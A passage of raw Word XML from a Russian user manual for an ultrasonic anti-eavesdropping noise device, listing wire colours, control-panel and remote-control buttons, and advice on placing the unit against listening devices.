          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA6BC1">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>Серый</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA6BC1">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">— </w:t>
      </w:r>
      <w:r w:rsidRPr="00DA6BC1">
        <w:rPr>
          <w:spacing w:val="-3"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">выход </w:t>
      </w:r>
      <w:r w:rsidRPr="00DA6BC1">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">на индикатор </w:t>
      </w:r>
      <w:r w:rsidRPr="00DA6BC1">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>ERROR</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA6BC1">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> Фиолетовый</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA6BC1">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">— </w:t>
      </w:r>
      <w:r w:rsidRPr="00DA6BC1">
        <w:rPr>
          <w:spacing w:val="-3"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">вход </w:t>
      </w:r>
      <w:r w:rsidRPr="00DA6BC1">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">кнопки «уменьшение громкости» </w:t>
      </w:r>
      <w:r w:rsidRPr="00DA6BC1">
        <w:rPr>
          <w:spacing w:val="-3"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>Голубой</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA6BC1">
        <w:rPr>
          <w:spacing w:val="-3"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00DA6BC1">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">— </w:t>
      </w:r>
      <w:r w:rsidRPr="00DA6BC1">
        <w:rPr>
          <w:spacing w:val="-3"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">вход </w:t>
      </w:r>
      <w:r w:rsidRPr="00DA6BC1">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>кнопки «увеличение громкости» Желтый</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA6BC1">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:tab/>
        <w:t>—</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA6BC1">
        <w:rPr>
          <w:spacing w:val="-1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00DA6BC1">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>антенна</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00DA6BC1" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:pPr>
        <w:pStyle w:val="ad"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="5188"/>
        </w:tabs>
        <w:ind w:firstLine="549"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA6BC1">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>Красный</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA6BC1">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:tab/>
        <w:t>— питание (плюс 12В источника</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA6BC1">
        <w:rPr>
          <w:spacing w:val="-4"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00DA6BC1">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>питания)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00DA6BC1" w:rsidRDefault="002C1237" w:rsidP="00B45DB0">
      <w:pPr>
        <w:pStyle w:val="ad"/>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="ru-RU" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="0" distR="0" simplePos="0" relativeHeight="251688448" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>3032125</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>186055</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1777365" cy="1574165"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="14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77365"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DA6BC1"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2C1237" w:rsidP="00B45DB0">
      <w:pPr>
        <w:pStyle w:val="ad"/>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="ru-RU" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="0" distR="0" simplePos="0" relativeHeight="251689472" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>2952750</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>80645</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1602740" cy="1041400"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="5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0274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r w:rsidRPr="00DA6BC1">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>ППДУ</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00DA6BC1" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:pPr>
        <w:pStyle w:val="ad"/>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA6BC1">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>Назначение кнопок и индикаторов.</w:t>
      </w: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right="397" w:firstLine="709"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA6BC1">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>MODE</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA6BC1">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> – индикатор состояния работы. </w:t>
      </w:r>
      <w:r w:rsidRPr="00DA6BC1">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>ERROR</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA6BC1">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> — индикатор ошибок.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00DA6BC1" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:pPr>
        <w:pStyle w:val="ad"/>
        <w:ind w:left="0" w:right="766" w:firstLine="709"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA6BC1">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>POWER</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA6BC1">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> - Включение/выключение прибора.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00DA6BC1" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:pPr>
        <w:pStyle w:val="ad"/>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA6BC1">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>MODE</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA6BC1">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> — не используется</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00DA6BC1" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:pPr>
        <w:pStyle w:val="ad"/>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA6BC1">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>РПДУ</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00DA6BC1" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:pPr>
        <w:pStyle w:val="ad"/>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA6BC1">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>Назначение кнопок и индикаторов.</w:t>
      </w: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right="539" w:firstLine="709"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA6BC1">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>А – Включение/выключение прибора. В — не используется</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00DA6BC1" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:pPr>
        <w:pStyle w:val="ad"/>
        <w:ind w:left="0" w:right="1328" w:firstLine="709"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA6BC1">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>С — уменьшение громкости речеподобной помехи</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00DA6BC1" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:pPr>
        <w:pStyle w:val="ad"/>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA6BC1">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>D</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA6BC1">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> — увеличение громкости речеподобной помехи.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00DA6BC1" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:pPr>
        <w:pStyle w:val="ad"/>
        <w:ind w:left="0" w:right="147" w:firstLine="709"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA6BC1">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>Светодиодный индикатор — загорается при надатии кнопки на брелке и</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00DA6BC1" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:pPr>
        <w:pStyle w:val="ad"/>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA6BC1">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>показывает, что брелок работает</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00DA6BC1" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:pPr>
        <w:pStyle w:val="ad"/>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRDefault="002C1237" w:rsidP="00B45DB0">
      <w:pPr>
        <w:pStyle w:val="ad"/>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="ru-RU" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="0" distR="0" simplePos="0" relativeHeight="251690496" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>2865120</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>1270</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1562735" cy="1319530"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="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735"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2C1237" w:rsidP="00B45DB0">
      <w:pPr>
        <w:pStyle w:val="ad"/>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="ru-RU" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="0" distR="0" simplePos="0" relativeHeight="251691520" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>2905125</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>64770</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1451610" cy="946150"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="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5161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r w:rsidRPr="00DA6BC1">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>УСТАНОВКА И ПОДКЛЮЧЕНИЕ.</w:t>
      </w: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jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA6BC1">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>Выберите место для установки изделия. При выборе места, для лучшей эффективности работы прибора, исходите из следующих соображений:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00DA6BC1" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:pPr>
        <w:pStyle w:val="ad"/>
        <w:ind w:left="0"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прибор должен располагаться между вами и потенциальным местом съема информации</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00DA6BC1" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:pPr>
        <w:pStyle w:val="ad"/>
        <w:ind w:left="0"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чем ближе прибор к месту потенциального съема информации — тем эффективнее его работа</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00DA6BC1" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:pPr>
        <w:pStyle w:val="ad"/>
        <w:ind w:left="0"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если требуется полная маскировка изделия, то рекомендуем установить два прибора паралельно по краям стола, таким образом, чтобы они вызывали ассоциации с компьютерными колонками</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00DA6BC1" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:pPr>
        <w:pStyle w:val="ad"/>
        <w:ind w:left="0" w:right="418"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при установке учитывайте угол диаграммы направленности излучателей, если требуется больший угол, то можно использовать несколько приборов или установить прибор с большим углом.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00DA6BC1" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:pPr>
        <w:pStyle w:val="ad"/>
        <w:ind w:left="0"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Избегайте преград на пути распространения ультразвукового излучения, это сильно снизит эффективность подавления.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00DA6BC1" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:pPr>
        <w:pStyle w:val="ad"/>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA6BC1">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>Ось излучения пьезоизлучателей находится напротив шва акустической ткани. Всегда шов акустической ткани должен быть с вашей стороны. Найдите место для установки коммутационной коробки, ППДУ и источника питания, с учетом того, что длинна провода от прибора составляет 1,8 метров, длинна провода от ППДУ — 2 метра.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00DA6BC1" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:pPr>
        <w:pStyle w:val="ad"/>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00DA6BC1" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:pPr>
        <w:pStyle w:val="ad"/>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA6BC1">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Диаграмма направленности приборов ТУБУС — Н</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00DA6BC1" w:rsidRDefault="002C1237" w:rsidP="00B45DB0">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="7519"/>
        </w:tabs>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B45DB0">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="1333500" cy="1135380"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="3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3500" cy="1135380"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidR="00B45DB0" w:rsidRPr="00DA6BC1">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00B45DB0">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="1097280" cy="1135380"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="3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97280" cy="1135380"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00DA6BC1" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:pPr>
        <w:pStyle w:val="ad"/>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00DA6BC1" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:pPr>
        <w:pStyle w:val="ad"/>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00DA6BC1" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:pPr>
        <w:pStyle w:val="ad"/>
        <w:ind w:left="0" w:right="1080" w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA6BC1">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>Подключите</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA6BC1">
        <w:rPr>
          <w:spacing w:val="-5"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00DA6BC1">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>прибор</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA6BC1">
        <w:rPr>
          <w:spacing w:val="-4"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00DA6BC1">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>согласно</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA6BC1">
        <w:rPr>
          <w:spacing w:val="-5"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00DA6BC1">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>схеме</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA6BC1">
        <w:rPr>
          <w:spacing w:val="-5"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00DA6BC1">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>подключения.</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA6BC1">
        <w:rPr>
          <w:spacing w:val="-5"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00DA6BC1">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>Для</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA6BC1">
        <w:rPr>
          <w:spacing w:val="-7"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00DA6BC1">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>удобства</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA6BC1">
        <w:rPr>
          <w:spacing w:val="-5"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00DA6BC1">
        <w:rPr>
